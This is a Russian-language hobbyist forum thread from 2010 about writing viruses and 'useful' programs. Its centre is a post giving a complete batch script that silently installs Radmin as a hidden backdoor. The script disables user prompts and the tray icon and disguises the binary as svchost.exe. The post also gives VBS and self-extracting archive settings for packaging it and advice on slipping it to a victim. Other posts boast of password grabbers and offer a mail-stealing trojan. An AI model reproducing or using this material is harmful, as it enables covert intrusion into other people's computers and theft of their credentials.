Перейти к содержимому


Свернуть блок чата Кричалка Открыть чат во всплывающем окне

В чате действуют все правила форума. Модераторы могут блокировать пользователей и редактировать сообщения. Реклама и объявления запрещены - бан!
@  Baron : (08 Февраль 2024 - 18:52 ) блин, совсем забыл )))) второй в 2024 ))))
@  Erlan : (26 Январь 2024 - 09:54 ) первый в 2024
@  Салоник : (26 Август 2023 - 03:36 ) Всем салам алейкум!!! Ну здравствуй мое первое окно в неизведанное! Давненько не виделись)
@  CDR : (02 Май 2023 - 15:11 ) Что за перекличка тут у вас?
@  demiurg : (27 Март 2023 - 15:33 ) Третий в 2023
@  bodr : (22 Март 2023 - 16:38 ) второй в 2023 :X
@  Baron : (01 Март 2023 - 14:53 ) первый в 2023 )
@  CDR : (28 Декабрь 2022 - 16:28 ) @F@NTOM :huh:
@  CDR : (28 Декабрь 2022 - 16:27 ) @Baron Воистину! :fellow:
@  Gerion : (27 Декабрь 2022 - 02:34 ) :victory:
@  Chikitos : (30 Октябрь 2022 - 14:31 ) Ы!! Многоуважаемые Чатлане! могет кто в курсе, или разъяснит! Не нашел нигде могу ли (и каким образом) оплачивать услуги тырнета чрез мобилное приложение Halyk home bank
@  Baron : (17 Октябрь 2022 - 11:06 ) пару раз в год надо оставлять хоть какой-нибудь комментарий! чатик живи...
@  Silver : (04 Октябрь 2022 - 15:30 ) Всем ку. Мобилизованные в Петропавловск есть?) желательно айтишники
@  F@NTOM : (16 Июль 2022 - 22:27 ) @hUYAX Макс)))) ты ж в группе по кс) пиши туда гоу играть) я в рот топтал клубы эти) лучше на fastcupe дома поиграю)
@  hUYAX : (05 Июнь 2022 - 23:24 ) @F@NTOM чё в кс больше не зовёшь
@  hUYAX : (05 Июнь 2022 - 23:24 ) хе-хе
@  F@NTOM : (02 Апрель 2022 - 23:33 ) Салам!
@  De@g : (15 Март 2022 - 11:35 ) Всем привет
@  KOTNOR : (29 Январь 2022 - 22:27 ) Spider
@  demiurg : (28 Январь 2022 - 00:24 ) Все умерло. А когда то было так весело тут.
@  Baron : (18 Январь 2022 - 21:43 ) @F@NTOM жёны не поймут :laughl: , а так я за )))))
@  Mantred : (07 Январь 2022 - 20:30 ) Хорошо что радио работает у есилки, можно хоть какие то новости послушать!
@  Mantred : (07 Январь 2022 - 20:28 ) Приринг то живой?
@  ORT : (07 Январь 2022 - 01:32 ) локалка только чуть чуть
@  Mantred : (06 Январь 2022 - 23:00 ) Жаль, ну хоть форум работает)))
@  king : (06 Январь 2022 - 22:53 ) нет
@  Mantred : (06 Январь 2022 - 20:34 ) Люди подскажите в еслилке интернет работает?
@  zest : (31 Декабрь 2021 - 19:42 ) всех с наступающим новым 2022 годом!!! Ура товарищи................
@  Melwood : (24 Декабрь 2021 - 10:53 ) Добрый день)
@  F@NTOM : (18 Декабрь 2021 - 23:28 ) @Baron Только если девчонки пойдут)
@  F@NTOM : (18 Декабрь 2021 - 23:28 ) @CDR Все дети уже выросли))) мужчинами ходятф0
@  F@NTOM : (18 Декабрь 2021 - 23:27 ) @Erlan 18.12.2021 снова играли в клубе))) ееееее
@  PiXeL : (10 Сентябрь 2021 - 20:34 ) О, пароль вспомнил)
@  CDR : (26 Июль 2021 - 12:21 ) @Erlan :ok:
@  Erlan : (23 Июль 2021 - 19:46 ) играли в клубе как будто середину 2000 вспомнил
@  Erlan : (23 Июль 2021 - 19:46 ) мы тут недавно собирались в кс 1.6 играли, из есильки несколько челов было в том числе Fantom
@  Erlan : (23 Июль 2021 - 19:46 ) @Wil салам
@  Silver : (30 Июнь 2021 - 19:15 ) :blink:
@  Erlan : (28 Июнь 2021 - 12:01 ) tuktuk
@  CDR : (23 Июнь 2021 - 11:54 ) :hi:

Вирусняшки и Полезность


Сообщений в теме: 13

#1 OFFLINE   MoRoZko

    Собераю "Спасибо" на Взлом Пентагона >) помогите


  • Участники
  • PipPipPipPipPip
  • 394 сообщений
23

Текущее настроение: Paranoid

Отправлено 15 Сентябрь 2010 - 20:13

В тебе обсудим:
кто чем страдал, что дошел до этого)
кто какую пакасть писал, у кого что работает что неработает)
если нужна помошь по вирусописанию или просто программописанию пишем суда поможем чем сможем как говориться)


Кто хочет пример может не читать


Прикрепленное изображение: 145576.jpg


Как пример:
Я сам просто страдал тем чем страдает 90% свободново времени мужыки, да плюс агент "недоброжелателя хотел сильно узнать". Пакостей писал много и много ещё напишу, написать то можно всё просто фантазии не набираеться, помошь собственно мне тоже требуеться, ток в идеях, призываю народ на выложение всяких идей "умных" вирусов, программ от которых польза есть...
Пишу беспалевные умные вирусы, например Скрытый радмин который уже всеми антивирями палиться переписал под беспалевного, всякие разные грабберы(для тех кто незнает: пришёл всунул флешку, ушёл и чуть ли ни все пороли которые есть на компе с собой унёс на ней же, ток их увидишь токо ты), ну или "почти" грабберы, запустил "обычную" программку, а пороли ко мне на почту пришли, из полезностей писал сортировку файлов (музыку в папку музыку, картинки в папку картинки и т.д.) таймеры всякие, будильники)))) думаю многи люди заинтересуються... Сразу говорю "чистые вирусы" скидывать небуду, пишем сами я просто помогать буду хотя может и договоримся)))

Тему создаю только для того чтобы "хакеров самоучек, начинающих" ну и естественно "начинающих мелко программописателей" с ног поднять, поучить чемунить)

зы: сам хакером неявляюсь, поролей куча чужых на компе, но непользуюсь) я добрый)



незабываем также пишем полезные программы они на ровне идут по сложности)

Сообщение отредактировал MoRoZko: 15 Сентябрь 2010 - 20:14

Компьютер старый, работает быстро, стоит в холодильнике =D
В чем различе моего допотопного процессора и i7, я нашел отличие только в том что вентелятор у меня крутиться быстрее)

#2 OFFLINE   paranoid

    master


  • Участники
  • PipPipPipPipPipPip
  • 1 125 сообщений
34

Текущее настроение: Woot!

Отправлено 15 Сентябрь 2010 - 20:17

сорцы в студию.

#3 OFFLINE   MoRoZko

    Собераю "Спасибо" на Взлом Пентагона >) помогите

  • Topic Starter

  • Участники
  • PipPipPipPipPip
  • 394 сообщений
23

Текущее настроение: Paranoid

Отправлено 15 Сентябрь 2010 - 20:19

Просмотр сообщенияmaster_of_puppet (15.09.2010, 20:17) писал:

сорцы в студию.
хы хы
зы: кстате читы даже непросите небуду, нехочу и помогать с ними небуду)
Компьютер старый, работает быстро, стоит в холодильнике =D
В чем различе моего допотопного процессора и i7, я нашел отличие только в том что вентелятор у меня крутиться быстрее)

#4 OFFLINE   paranoid

    master


  • Участники
  • PipPipPipPipPipPip
  • 1 125 сообщений
34

Текущее настроение: Woot!

Отправлено 15 Сентябрь 2010 - 20:29

если в этой теме будут только понты, тогда от нее пользы 0.

#5 OFFLINE   MoRoZko

    Собераю "Спасибо" на Взлом Пентагона >) помогите

  • Topic Starter

  • Участники
  • PipPipPipPipPip
  • 394 сообщений
23

Текущее настроение: Paranoid

Отправлено 15 Сентябрь 2010 - 20:42

Просмотр сообщенияmaster_of_puppet (15.09.2010, 20:29) писал:

если в этой теме будут только понты, тогда от нее пользы 0.
да нафиг понты просто я по сообственному опыту знаю) пишишь чото неработает и начинешь по инету искать, проще то спросить чо в скрипте неработает, выложить то что сделал) лично я исправлю чем смогу помогу. а полезные программы выкладывать буду.

говорю вы мне идеи дайте я их в жизнь плавненько переведу) как наберёться поболее выложу)

у кого есть какие идеи???
Компьютер старый, работает быстро, стоит в холодильнике =D
В чем различе моего допотопного процессора и i7, я нашел отличие только в том что вентелятор у меня крутиться быстрее)

#6 OFFLINE   Victor.Z

    Участник


  • Участники
  • PipPipPipPipPip
  • 220 сообщений
-3

Текущее настроение: Не выбрано

Отправлено 02 Октябрь 2010 - 13:31

Просмотр сообщенияMoRoZko (15.09.2010, 20:42) писал:

да нафиг понты просто я по сообственному опыту знаю) пишишь чото неработает и начинешь по инету искать, проще то спросить чо в скрипте неработает, выложить то что сделал) лично я исправлю чем смогу помогу. а полезные программы выкладывать буду.

говорю вы мне идеи дайте я их в жизнь плавненько переведу) как наберёться поболее выложу)

у кого есть какие идеи???
Часто с Инета скачиваешь какую-нибудь прогу, она в Rar-овской папке, а начинаешь разархивировать, они сволочи просят SMS-ку отправить, для получения кода (естественно не бесплатно). Можно какой-нибудь программулинкой этот пароль взломать? Потому-что неизвестно сколько здерут за SMS-ку и не факт что пароль пришлют.

#7 OFFLINE   yonga

    Omg! ๏̯͡๏


  • Модераторы
  • PipPipPipPipPipPipPip
  • 3 316 сообщений
52

Текущее настроение: Не выбрано

Отправлено 02 Октябрь 2010 - 13:36

Просмотр сообщенияVictor.Z (2.10.2010, 12:31) писал:

Часто с Инета скачиваешь какую-нибудь прогу, она в Rar-овской папке, а начинаешь разархивировать, они сволочи просят SMS-ку отправить, для получения кода (естественно не бесплатно). Можно какой-нибудь программулинкой этот пароль взломать? Потому-что неизвестно сколько здерут за SMS-ку и не факт что пароль пришлют.
взломать можно , токо это долго и не эффективно
зависит от сложности пароля
Нормально делай, нормально будет.

#8 OFFLINE   DenisMitchell

    Был не раз


  • Участники
  • PipPipPip
  • 78 сообщений
0

Текущее настроение: Не выбрано

Отправлено 05 Октябрь 2010 - 04:47

Мой совет просто нужно скачать файл по другой ссылке.. когда требуют пароль для разархивации файла, это значит что файл был запакован через какуето партнёрскую программу.. На этом люди делают деньги и неплохие..
По поводу самой темы имеется вопрос: Есть ли на форуме человек который разбирается в системном и низкоуровневом программировании? Есть несколько вопросов...
In Fraud We Trust
In Code We Trust
In Stuff We Trust
In Sex We Trust
In I I Trust

#9 OFFLINE   paranoid

    master


  • Участники
  • PipPipPipPipPipPip
  • 1 125 сообщений
34

Текущее настроение: Woot!

Отправлено 05 Октябрь 2010 - 09:40

Просмотр сообщенияDenisMitchell (5.10.2010, 04:47) писал:

Мой совет просто нужно скачать файл по другой ссылке.. когда требуют пароль для разархивации файла, это значит что файл был запакован через какуето партнёрскую программу.. На этом люди делают деньги и неплохие..
По поводу самой темы имеется вопрос: Есть ли на форуме человек который разбирается в системном и низкоуровневом программировании? Есть несколько вопросов...
я чуть чуть занимался.

#10 OFFLINE   DenisMitchell

    Был не раз


  • Участники
  • PipPipPip
  • 78 сообщений
0

Текущее настроение: Не выбрано

Отправлено 05 Октябрь 2010 - 12:15

Уже разобрался со своей проблемой! Нужно было прогнать через отладчик один странно ведущий себя файл, как выяснилось это оказался кейлогер. Просто не мог понять куда отчёты летят, вопрос решился на раз два, просто отснифал все пакеты у себя и всё :laughing:
In Fraud We Trust
In Code We Trust
In Stuff We Trust
In Sex We Trust
In I I Trust

#11 OFFLINE   MoRoZko

    Собераю "Спасибо" на Взлом Пентагона >) помогите

  • Topic Starter

  • Участники
  • PipPipPipPipPip
  • 394 сообщений
23

Текущее настроение: Paranoid

Отправлено 10 Октябрь 2010 - 19:10

У вентуры появился вопрос на счёт скрытого радмина сейчас всё популярно всем обьясню

в инете вы рабочий врядтли найдёте так как файл регистра палиться антивирями, ну почти всеми

исправляем этот недуг вместо обычного reg.reg файла забиваем струкнуру его в бат файл откуда и видёться сама установка радмина
приблезительно вот так будет выглядеть:

Цитата

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v LogFilePath /t REG_SZ /d c:\logfile.txt /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v NTAuthEnabled /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v EnableLogFile /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v FilterIp /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v AskUser /t REG_BINARY /d 00000000 /f

терь обьяснение к веткам:
Parameter - пороль на радмин хоть он и храниться в зашифрованом виде я "трулулу" вставил
Port - на какой порт будет ставиться тоже трулулу вместо хэша
менять выше перечисленые параметры трудоёмко т.к. они зашифрованы

далее просто, но немение важно:
AskUser - спраишвать у юсера при конекте, т.к. радмин скрытый ставим неспрашивать
DisableTrayIcon - показывать иконку в трее, тоже нет

далее в батнике пишем куды будем копировать сорцы самого радмина, а иммено:
AdmDll.dll
raddrv.dll
svchost.exe зы: может называться как угодно у меня так
копируем это всё командой типо copy /y в %SYSTEMROOT%/help\
пример:

Цитата

copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"

терь непосредственно устанавливаем сам радмин из уже всего готовенького:

Цитата

"%SYSTEMROOT%/help\svchost.exe" /install /silence
и запускаем

Цитата

"%SYSTEMROOT%/help\svchost.exe" /start
он сам прописываеться на автозагрузку, причём административную и обычному пользователю невидно
ещё нам нужен vbs скрипт для чего узнаете попойже
vbs:

Цитата

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ("наш_радмин.bat")
кстате наш_радмин.bat может быть и exe файлом, нужно всеголишь компилятор... и окошко батника мигать не будет перед глазами когда установка будет проходить

Впринцыпе разобрались с радмином терь как из 4х файлов сделать один, а очень легко)))
для этого нам потребуеться обычный архиватор WinRar который у всех есть надеюсь...
выбераем файлы и прописываем в коментарии что то в роде:

Цитата

Path=xak\
SavePath
Setup=st.vbs
Silent=1
Overwrite=1
переменые
Path - куды сейвим
Setup - что запускаем после распоковки, т.к. запуск bat файлов из архива заприщенно системой безопасности microsoft, пользуемся vbs который уже будет запускать bat файл ну или exe
Silent - не выдовать окон
Overwrite - перезаписывать все файлы без запроса

в исходе получаем 1 самораспоковывающийся архив с любым значком который нам понравиться, и при его запуске не будет происходить нечего, как будто нерабочий файл, ну или бат окошко мигать будет...(пользуйтесь компилятором!!!)
всё что осталось либо замоскировать его какнибуть и скинуть шобы скачали запустили
либо же тупо пихнуть его жертве
зы: работает токо при открытых портах, на инет у нас без hamachi или какойнить проги на подобе работать небудет! а у нас через vpn пользуйтесь скоко влезет!


в итоге у нас получаеться:

Цитата

@echo on

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f

reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v LogFilePath /t REG_SZ /d c:\logfile.txt /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v NTAuthEnabled /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v EnableLogFile /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v FilterIp /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v AskUser /t REG_BINARY /d 00000000 /f


copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"
"%SYSTEMROOT%/help\svchost.exe" /install /silence
"%SYSTEMROOT%/help\svchost.exe" /start

кому помог или просто понравилось))) НЕ ЗАБЫВАЙТЕ ТЫКАТЬ СПАСИБО!!!

Сообщение отредактировал MoRoZko: 10 Октябрь 2010 - 19:13

Компьютер старый, работает быстро, стоит в холодильнике =D
В чем различе моего допотопного процессора и i7, я нашел отличие только в том что вентелятор у меня крутиться быстрее)

#12 OFFLINE   MoRoZko

    Собераю "Спасибо" на Взлом Пентагона >) помогите

  • Topic Starter

  • Участники
  • PipPipPipPipPip
  • 394 сообщений
23

Текущее настроение: Paranoid

Отправлено 10 Октябрь 2010 - 19:16

Просмотр сообщенияVictor.Z (2.10.2010, 14:31) писал:

Часто с Инета скачиваешь какую-нибудь прогу, она в Rar-овской папке, а начинаешь разархивировать, они сволочи просят SMS-ку отправить, для получения кода (естественно не бесплатно). Можно какой-нибудь программулинкой этот пароль взломать? Потому-что неизвестно сколько здерут за SMS-ку и не факт что пароль пришлют.
кстате

Просмотр сообщенияVentura (2.10.2010, 14:36) писал:

взломать можно , токо это долго и не эффективно
зависит от сложности пароля
обычный брут в среднем 4-6часов на взлом 8и значного пороля(зависит от мощьности компа)
или алгоритм влома ищи в гугле) если найдёшь на взлом самого архива уйдёт не больше 5ти минут

и ещё как вариант, с какого сайта качаешь такой и пороль...
допустим на antichatе на все архивы пороль antichat или antichat.ru


Просмотр сообщенияDenisMitchell (5.10.2010, 05:47) писал:

Мой совет просто нужно скачать файл по другой ссылке.. когда требуют пароль для разархивации файла, это значит что файл был запакован через какуето партнёрскую программу.. На этом люди делают деньги и неплохие..
По поводу самой темы имеется вопрос: Есть ли на форуме человек который разбирается в системном и низкоуровневом программировании? Есть несколько вопросов...

я в программировании шарю болемение обращайся

Сообщение отредактировал MoRoZko: 10 Октябрь 2010 - 19:23

Компьютер старый, работает быстро, стоит в холодильнике =D
В чем различе моего допотопного процессора и i7, я нашел отличие только в том что вентелятор у меня крутиться быстрее)

#13 OFFLINE   MoRoZko

    Собераю "Спасибо" на Взлом Пентагона >) помогите

  • Topic Starter

  • Участники
  • PipPipPipPipPip
  • 394 сообщений
23

Текущее настроение: Paranoid

Отправлено 10 Октябрь 2010 - 19:20

счас пойду погуляю и напишу взлом майл агента, тип троя, ток сорцы выкладывать небуду просто напишу чо откуда взять и как это потом ипользовать)))

зы: кому надо пишите ПМ скину вирь, вы его торжественно вручите жертве под какимнить предлогом а потом я вам скинун логин пасс уже с моей почты вам в личку)))

Сообщение отредактировал MoRoZko: 10 Октябрь 2010 - 19:21

Компьютер старый, работает быстро, стоит в холодильнике =D
В чем различе моего допотопного процессора и i7, я нашел отличие только в том что вентелятор у меня крутиться быстрее)

#14 OFFLINE   PARADOX

    Где мы - там победа!


  • Участники
  • PipPipPipPipPipPip
  • 1 370 сообщений
56

Текущее настроение: Spaced

Отправлено 10 Октябрь 2010 - 20:29

Просмотр сообщенияMoRoZko (10.10.2010, 19:20) писал:

зы: кому надо пишите ПМ скину вирь, вы его торжественно вручите жертве под какимнить предлогом а потом я вам скинун логин пасс уже с моей почты вам в личку)))

Да зачем писать тебе, давай лучше встретимся и ты сам при встрече все расскажешь.
Я тебе писал, ты не ответил.
Pαrάδοξος





Количество пользователей, читающих эту тему: 1

0 пользователей, 1 гостей, 0 анонимных

Наши страницы: Страница в FacebookГруппа в моем миреГруппа вконтактеЛента в Twitter